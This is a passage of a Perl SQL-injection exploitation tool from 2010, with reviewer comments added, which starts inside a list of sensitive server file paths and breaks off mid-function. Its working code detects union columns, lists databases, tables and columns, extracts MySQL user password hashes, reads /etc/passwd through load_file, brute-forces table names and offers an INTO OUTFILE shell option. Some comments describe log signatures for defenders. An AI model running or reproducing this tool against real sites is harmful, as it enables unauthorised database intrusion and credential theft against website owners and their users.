p4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/pro
ftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');

use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common;
use URI::Split qw(uri_split);

# Shared HTTP client; every request the script sends goes through it (see toma()).
my $nave = LWP::UserAgent->new();
# Abandon any single request after 5 seconds.
$nave->timeout(5);
# Fixed, browser-like User-Agent. As written the literal has no space between
# "Gecko/20080201" and "Firefox/2.0.0.12", so the exact string is a stable
# value to search for in web-server access logs.
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

# Program flow: print the banner, prompt interactively unless exactly two
# command-line arguments were supplied, then print the footer and exit.
&head;
unless(@ARGV == 2) {
&menu;
} else {
# NOTE(review): the second value is read from $ARVG[1], which is not an element
# of @ARGV; no "use strict" is visible here that would reject the name.
&scan($ARGV[0],$ARVG[1]);
}
&finish;

# Interactive prompt: reads the page URL and a "bypass" style from STDIN and
# passes both to scan(). The prompt text advertises "--", "/*" and "%00";
# bypass() itself compares the answer against "/*" and "%20" and treats
# anything else as the default style.
sub menu {
print "[Page] : ";
chomp(my $page=<STDIN>);
print "\n[Bypass : -- /* %00] : ";
chomp(my $bypass = <STDIN>);
print "\n\n";
&scan($page,$bypass);
}

# Handles one target: $_[0] is the page URL, $_[1] the bypass style.
# A URL that already contains the placeholder word "hackman" is sent straight
# to the option menu; after that the column-count probe (the sub named
# "length") is called and the menu is opened when the probe reports success.
# Findings are appended to logs/webs/<URL authority>.txt through savefile().
sub scan {
print "[Status] : Scanning.....\n";
$pass = &bypass($_[1]);
# The log file is named after the authority (host[:port]) part of the URL.
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
if ($_[0]=~/hackman/ig) {
savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
&menu_options($_[0],$pass,$save);
}
# Called with a leading '&' so the user-defined sub is used rather than Perl's
# builtin length().
my ($gen,$save,$control) = &length($_[0],$_[1]);
if ($control eq 1) {
print "[Status] : Enjoy the menu\n\n";
&menu_options($gen,$pass,$save);
} else {
print $control;
print "[Status] : Length columns not found\n\n";
# Wait for Enter, then go back to the banner and the interactive prompt.
<STDIN>;
&head;
&menu;
}
}

# Clears the console by running the shell command "cls" and prints the ASCII-art
# banner. "cls" is the Windows console command; on a shell without it the
# system() call simply fails and the banner is still printed.
sub head {
system 'cls';
print qq(


@      @@   @             
@@     @  @ @@             
@ @@  @  @  @ @   @ @ @@@
@ @   @  @  @@ @ @@@ @  @
@@    @  @  @  @  @   @@@
@ @   @  @  @  @  @  @  @
@@@ @   @@   @@@  @@@ @@@@@




);
}




# Prints the author/copyright footer, preceded by four blank lines.
sub copyright {
my $notice = "\n\n\n\n(C) Doddy Hackman 2010\n\n";
print $notice;
}


# Fetches the URL in $_[0] with the shared client $nave and returns the response
# body. Every request is a plain GET, so whatever was appended to the URL
# (including the SQL fragments built elsewhere in this script) appears in the
# request line and therefore in the target's access log.
sub toma {
my $response = $nave->request(GET $_[0]);
return $response->content;
}


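# Appends one line to a log file under logs/webs/.
#   $_[0]  file name relative to logs/webs/ (callers pass "<URL authority>.txt")
#   $_[1]  text to write; a newline is added after it
# The mode is given as a separate argument (three-arg open) so characters in
# the file name can never be interpreted as an open mode or a pipe, and the
# handle is lexical so it cannot collide with another SAVE handle.
# Failures are reported with warn() and the call returns without writing; the
# logging stays best-effort and never aborts the caller.
# NOTE(review): the name comes from a URL typed by the user; it is used as-is,
# so path separators in it are not filtered here.
sub savefile {
my ($name, $text) = @_;
my $target = "logs/webs/".$name;
open(my $log, '>>', $target) or do {
warn "savefile: cannot open $target: $!\n";
return;
};
print {$log} $text."\n";
close($log) or warn "savefile: cannot close $target: $!\n";
}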

# Prints the footer, waits for Enter and terminates the process with exit
# status 1. A second "sub finish" appears later in this file; Perl keeps the
# definition it compiles last.
sub finish {
my $footer = "\n\n\n(C) Doddy Hackman 2010\n\n";
print $footer;
my $ack = <STDIN>;
exit 1;
}


# Column-count probe. $_[0] is the page URL, $_[1] the bypass style.
# The sub shares its name with Perl's builtin length(); callers reach it with
# the explicit '&length(...)' form.
#
# Stages, each one an HTTP GET through toma():
#   1. "order by 9999999999" is appended to the URL; the probe continues only if
#      the response body contains one of the MySQL/PHP error strings listed in
#      the long condition below.
#   2. A one-column "union select 666" is sent and the MySQL "different number
#      of columns" message is looked for.
#   3. For 2..200 columns a growing "union select" list of char(...) markers is
#      sent; each marker decodes to RATSXPDOWN<n>RATSXPDOWN. When the marker
#      comes back in the page, the reflected column numbers are recorded.
# On success it logs the result and returns (URL with the first reflected
# column replaced by the placeholder "hackman", log name, 1).
#
# Defensive reading: stages 1 and 2 depend entirely on database error text
# being shown to the client, and stage 3 produces up to 199 consecutive
# requests whose query string contains "union", "select" and long char(...)
# lists, a pattern that is easy to alert on.
#
# NOTE(review): the braces in this span do not balance; the brace that would
# close the sub is not among these lines.
sub length {
my $rows  = "0";
my $asc;
my $page = $_[0];
# $pass1 is the token used between SQL words, $pass2 the trailing terminator.
($pass1,$pass2) = &bypass($_[1]);
$inyection = $page."1".$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;
$code = toma($inyection);
if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
$code1 = toma($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
my $patha = $1;
chomp $patha;
# First marker column; ascii() turns the text into a comma-separated code list.
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..200) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
$total.= ",".$rows;
$injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
# Collect every column number whose marker was echoed back in the page.
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
$control = 1;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
savefile($save.".txt","\n[Target confirmed] : $page");
savefile($save.".txt","[Bypass] : $_[1]\n");
savefile($save.".txt","[Limit] : The site has $rows columns");
savefile($save.".txt","[Data] : The number @number print data");
if ($patha) {
savefile($save.".txt","[Full Path Discloure] : $patha");
}
# Swap the first reflected column number for the placeholder word that the
# other subs later replace with their own expressions.
$total=~s/$number[0]/hackman/;
savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
}
}
}
}

# Maps the chosen bypass style in $_[0] to a two-element list:
# (token placed between SQL words, token appended at the end of the URL).
#   "/*"   -> ("/**/", "/*")
#   "%20"  -> ("%20",  "%00")
#   other  -> ("+",    "--")
sub bypass {
my $style = $_[0];
return ("/**/","/*") if $style eq "/*";
return ("%20","%00") if $style eq "%20";
return ("+","--");
}

# Returns the code points of the string in $_[0] as a comma-separated list,
# e.g. "AB" -> "65,66". Callers wrap the result in char(...).
sub ascii {
my @codepoints = unpack("U*", $_[0]);
return join(',', @codepoints);
}

# Inverse of ascii(): turns a comma-separated list of code points back into a
# string. The result is also written back into the caller's argument, because
# $_[0] aliases the variable that was passed in.
sub ascii_de {
my @chars = map { chr($_) } split(/,/, $_[0]);
$_[0] = join('', @chars);
return $_[0];
}

# "Information of the server" option. Arguments: URL containing the placeholder
# "hackman", bypass style, log name.
# The placeholder is replaced by expressions that emit the marker ERTOR854
# (char(69,82,84,79,82,56,53,52)); a response containing the marker means the
# corresponding query was executed. Three checks are made:
#   - is information_schema.tables readable,
#   - is mysql.user readable,
#   - does load_file() return data for the hex-encoded path in the request.
# Finally version(), database() and user() are requested in one query and the
# three values are printed and logged.
#
# Defensive reading: the second and third checks only succeed when the
# application's database account can read the mysql schema or holds the FILE
# privilege; an account restricted to its own schema makes both report OFF.
sub details {
my ($page,$bypass,$save) = @_;
($pass1,$pass2) = &bypass($bypass);
savefile($save.".txt","\n");
if ($page=~/(.*)hackman(.*)/ig) {
print "\n\n[+] Searching information..\n\n";
# Text before and after the placeholder in the URL.
my  ($start,$end) = ($1,$2);
$inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
$mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
$test1 = toma($inforschema);
$test2 = toma($mysqluser);
if ($test2=~/ERTOR854/ig) {
savefile($save.".txt","[mysql.user] : ON");
print "[mysql.user] : ON\n";
} else {
print "[mysql.user] : OFF\n";
savefile($save.".txt","[mysql.user] : OFF");
}
if ($test1=~/ERTOR854/ig) {
print "[information_schema.tables] : ON\n";
savefile($save.".txt","[information_schema.tables] : ON");
} else {
print "[information_schema.tables] : OFF\n";
savefile($save.".txt","[information_schema.tables] : OFF");
}
if ($test3=~/ERTOR854/ig) {
print "[+] load_file permite ver los archivos\n";
savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
}
# One query returning version, database name and user, separated by the marker.
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass2;
$code = toma($injection);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
} else {
print "\n[-] Not found any data\n";
}
}
}
}

# Main menu. $_[0] is the URL containing the placeholder "hackman", $_[1] the
# bypass value. Prints the fifteen options, reads one choice from STDIN and
# dispatches to the matching sub; every branch except "Change Target" (14) and
# "Exit" (15) ends in reload(), which redraws this menu. Input that matches no
# option also goes to reload().
# The log name is recomputed here from the authority part of the URL.
sub menu_options {
print "[Target confirmed] : $_[0]\n";
print "[Bypass] : $_[1]\n\n";

my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
print "[save] : /logs/webs/$save\n\n";
print "\n\n--== information_schema.tables ==--\n\n";
print "[1] : Show tables\n";
print "[2] : Show columns\n";
print "[3] : Show DBS\n";
print "[4] : Show tables with other DB\n";
print "[5] : Show columns with other DB\n";
print "\n\n--== mysql.user ==--\n\n";
print "[6] : Show users\n";
print "\n\n--== Others ==--\n\n";
print "[7] : Fuzzing tables\n";
print "[8] : Fuzzing columns\n";
print "[9] : Fuzzing files with load_file\n";
print "[10] : Dump\n";
print "[11] : Informacion of the server\n";
print "[12] : Create a shell with into outfile\n";
print "[13] : Show Log\n";
print "[14] : Change Target\n";
print "[15] : Exit\n";
print "\n\n[Option] : ";
chomp(my $opcion = <STDIN>);
if ($opcion eq "1") {
schematables($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "2") {
print "\n\n[Tabla] : ";
chomp(my $tabla = <STDIN>);
schemacolumns($_[0],$_[1],$save,$tabla);
&reload;
}
elsif ($opcion eq "3") {
&schemadb($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "4") {
print "\n\n[DAtabase] : ";
chomp(my $data =<STDIN>);
&schematablesdb($_[0],$_[1],$data,$save);
&reload;
}
elsif ($opcion eq "5"){
print "\n\n[DB] : ";
chomp(my $db =<STDIN>);
print "\n[Table] : ";
chomp(my $table =<STDIN>);
&schemacolumnsdb($_[0],$_[1],$db,$table,$save);
&reload;
}
elsif ($opcion eq "6") {
&mysqluser($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "13") {
# Opens the log with the Windows "start" command.
# NOTE(review): single-string system() goes through the shell, and $save is
# taken unfiltered from the URL, so shell metacharacters in it would be
# interpreted on the machine running this script.
$t = "logs/webs/$save.txt";
system("start $t");
&reload;
}
elsif ($opcion eq "15") {
&finish;
}
elsif ($opcion eq "14") {
&head;
&menu;
}
elsif ($opcion eq "7") {
&tabfuzz($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "8") {
print "\n\n[Tabla] : ";
chomp(my $tab  = <STDIN>);
&colfuzz($_[0],$_[1],$tab,$save);
&reload;
}
elsif ($opcion eq "9") {
&load($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "10") {
print "\n\n[Table to dump] : ";
chomp(my $tabla = <STDIN>);
print "\n[Column 1] : ";
chomp(my $col1 = <STDIN>);
print "\n[Column 2] : ";
chomp(my $col2 = <STDIN>);
print "\n\n";
# Argument order differs from the other subs: page, col1, col2, table, bypass, log.
&dump($_[0],$col1,$col2,$tabla,$_[1],$save);
&reload;
}
elsif ($opcion eq "11") {
print "\n\n";
&details($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "12") {
print "\n\n[Full Path Discloure] : ";
chomp(my $path = <STDIN>);
&into($_[0],$_[1],$path,$save);
&reload;
}
else {
&reload;
}
}

# Option 1: lists table names from information_schema.tables.
# Arguments: URL with placeholder, bypass style, log name.
# A Count(*) query gives the number of rows; the names are then fetched one
# request per row with "limit <n>,1", each wrapped in the marker RATSXPDOWN1
# (char(82,65,84,83,88,80,68,79,87,78,49)) so it can be cut out of the page.
# The loop starts at row 17 and the reported total is the count minus 17
# (presumably to skip the server's own metadata tables; not stated in the code).
#
# Defensive reading: this is one GET per table, all naming
# information_schema.tables in the query string, so the activity shows up as a
# burst of near-identical requests that differ only in the "limit" offset.
sub schematables {
$real = "1";
my ($page,$bypass,$save) = @_;
savefile($save.".txt","\n");
print "\n";
my $page1 = $page;
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","[DB] : default");
print "[+] Searching tables with schema\n\n";
# $page fetches names, $page1 fetches the row count.
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $resto = $1;
$total = $resto - 17;
print "[+] Tables Length :  $total\n\n";
savefile($save.".txt","[+] Searching tables with schema\n");
savefile($save.".txt","[+] Tables Length :  $total\n");
my $limit = $1;
for my $limit(17..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
print "[Table $real Found : $table ]\n";
savefile($save.".txt","[Table $real Found : $table ]");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}
}
# Shown after every menu action: prints "Finish", waits for Enter, redraws the
# banner and re-enters the menu.
sub reload {
my $done = "\n\n[+] Finish\n\n";
print $done;
my $ack = <STDIN>;
head();
# Kept in the '&name;' form on purpose: without parentheses the callee receives
# this sub's current @_, which is how the menu gets its arguments back.
&menu_options;
}


# Option 2: lists the column names of one table in the current database.
# Arguments: URL with placeholder, bypass style, log name, table name.
# The table name is sent as char(<code points>) (see ascii()) rather than as a
# quoted string. A Count(*) query against information_schema.columns gives the
# number of columns; names are then fetched one request per row with
# "limit <n>,1" and extracted between RATSXPDOWN1 markers.
sub schemacolumns {
my ($page,$bypass,$save,$table) = @_;
# $page3 is used for the count query, $page4 for the name queries.
my $page3 = $page;
my $page4 = $page;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
print "\n[DB] : default\n";
savefile($save.".txt","[DB] : default");
savefile($save.".txt","[Table] : $table\n");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns Length : $1 ]\n\n";
savefile($save.".txt","[Columns Length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

# Option 3: lists database names from information_schema.schemata.
# Arguments: URL with placeholder, bypass style, log name.
# A Count(*) query gives the number of schemas; names are then fetched one
# request per row and extracted between RATSXPDOWN1 markers. The names
# "information_schema", "mysql" and "phpmyadmin" are not printed or logged.
sub schemadb {
my ($page,$bypass,$save) = @_;
my $page1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Searching DBS\n\n";
($pass1,$pass2) = &bypass($bypass);
$page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page.$pass1."from".$pass1."information_schema.schemata");
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $limita = $1;
print "[+] Databases Length : $limita\n\n";
savefile($save.".txt","[+] Databases Length : $limita\n");
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit(0..$limita) {
$code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $control = $1;
# Skip the three schema names treated here as system/tooling databases.
if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
print "[Database $real Found] $control\n";
savefile($save.".txt","[Database $real Found] : $control");
$real++;
}
}
}
} else {
print "[-] information_schema = ERROR\n";
}
}

# Option 4: lists the tables of a named database.
# Arguments: $_[0] URL with placeholder, $_[1] bypass style, $_[2] database
# name, $_[3] log name.
# Same count-then-iterate scheme as the other schema subs, with the extra
# condition table_schema=char(<code points of the database name>).
sub schematablesdb {
my $page = $_[0];
my $db = $_[2];
my $page1 = $page;
savefile($_[3].".txt","\n");
print "\n\n[+] Searching tables with DB $db\n\n";
($pass1,$pass2) = &bypass($_[1]);
savefile($_[3].".txt","[DB] : $db");
# $page fetches names, $page1 fetches the row count.
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
print "[+] Tables Length :  $1\n\n";
savefile($_[3].".txt","[+] Tables Length :  $1\n");
my $limit = $1;
$real = "1";
for my $lim(0..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
savefile($_[3].".txt","[Table $real Found : $table ]");
print "[Table $real Found : $table ]\n";
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

# Option 5: lists the columns of a table in a named database.
# Arguments: URL with placeholder, bypass style, database name, table name,
# log name.
# Identical in structure to schemacolumns(), with an additional
# table_schema=char(...) condition built from the database name.
sub schemacolumnsdb {
my ($page,$bypass,$db,$table,$save) = @_;
# $page3 is used for the count query, $page4 for the name queries.
my $page3 = $page;
my $page4 = $page;
print "\n\n[+] Searching columns in table $table with DB $db\n\n";
savefile($save.".txt","\n");
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","\n[DB] : $db");
savefile($save.".txt","[Table] : $table");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns length : $1 ]\n\n";
savefile($save.".txt","[Columns length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

# Option 6: reads Host, User and Password from mysql.user.
# Arguments: URL with placeholder, bypass style, log name.
# A first request only checks that mysql.user is readable; a Count(*) query
# then gives the number of accounts, and each row is fetched with
# "limit <n>,1", its three fields separated by the marker RATSXPDOWN
# (0x524154535850444f574e). A response without the marker ends the loop via
# reload().
#
# Defensive reading: this works only when the web application's database
# account has SELECT on the mysql schema. Everything retrieved, password
# hashes included, is also written in clear to the local log file.
sub mysqluser {
my ($page,$bypass,$save) = @_;
my $cop = $page;
my $cop1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Finding mysql.users\n";
($pass1,$pass2) = &bypass($bypass);
$page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
$code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
if ($code=~/RATSXPDOWN/ig){
$cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n\n[+] Users Found : $1\n\n";
savefile($save.".txt","\n[+] Users mysql Found : $1\n");
for my $limit(0..$1) {
$cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
$code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
print "[Host] : $1 [User] : $2 [Password] : $3\n";
savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
} else {
&reload;
}}}
} else {
print "\n[-] mysql.user = ERROR\n";
}}

# Option 7: guesses table names from the built-in word list @buscar2.
# Arguments: $_[0] URL with placeholder, $_[1] bypass style, $_[2] log name.
# For each candidate one request selects the marker ERTOR854 "from <name>"; a
# response containing the marker is taken to mean the table exists.
#
# Defensive reading: this is a dictionary attack on the schema, one GET per
# word in the list, so it appears in logs as a long run of requests that
# differ only in the table name after "from".
sub tabfuzz {
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$count = "0";
savefile($_[2].".txt","\n");
print "\n";
if ($_[0] =~/(.*)hackman(.*)/g) {
my $start = $1; my $end = $2;
print "\n\n[+] Searching tables.....\n\n";
for my $table(@buscar2) {
chomp $table;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass1."from".$pass1.$table.$pass2;
$code = toma($injection);
if ($code =~/ERTOR854/g) {
$count++;
print "[Table Found] : $table\n";
savefile($_[2].".txt","[Table Found] : $table");
}}}
if ($count eq "0") { print "[-] Not found any table\n";
&reload;
}
}

# Option 8: guesses column names of one table from the word list @buscar1.
# Arguments: $_[0] URL with placeholder, $_[1] bypass style, $_[2] table name,
# $_[3] log name.
# For each candidate the column is selected between two ERTOR854 markers; a
# response containing the marker is taken to mean the column exists.
# If the URL carries no "hackman" placeholder an example command line is shown.
sub colfuzz {
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$count = "0";
savefile($_[3].".txt","\n");
print "\n";
if ($_[0] =~/(.*)hackman(.*)/) {
my $start = $1; my $end = $2;
print "[+] Searching columns for the table $_[2]...\n\n";
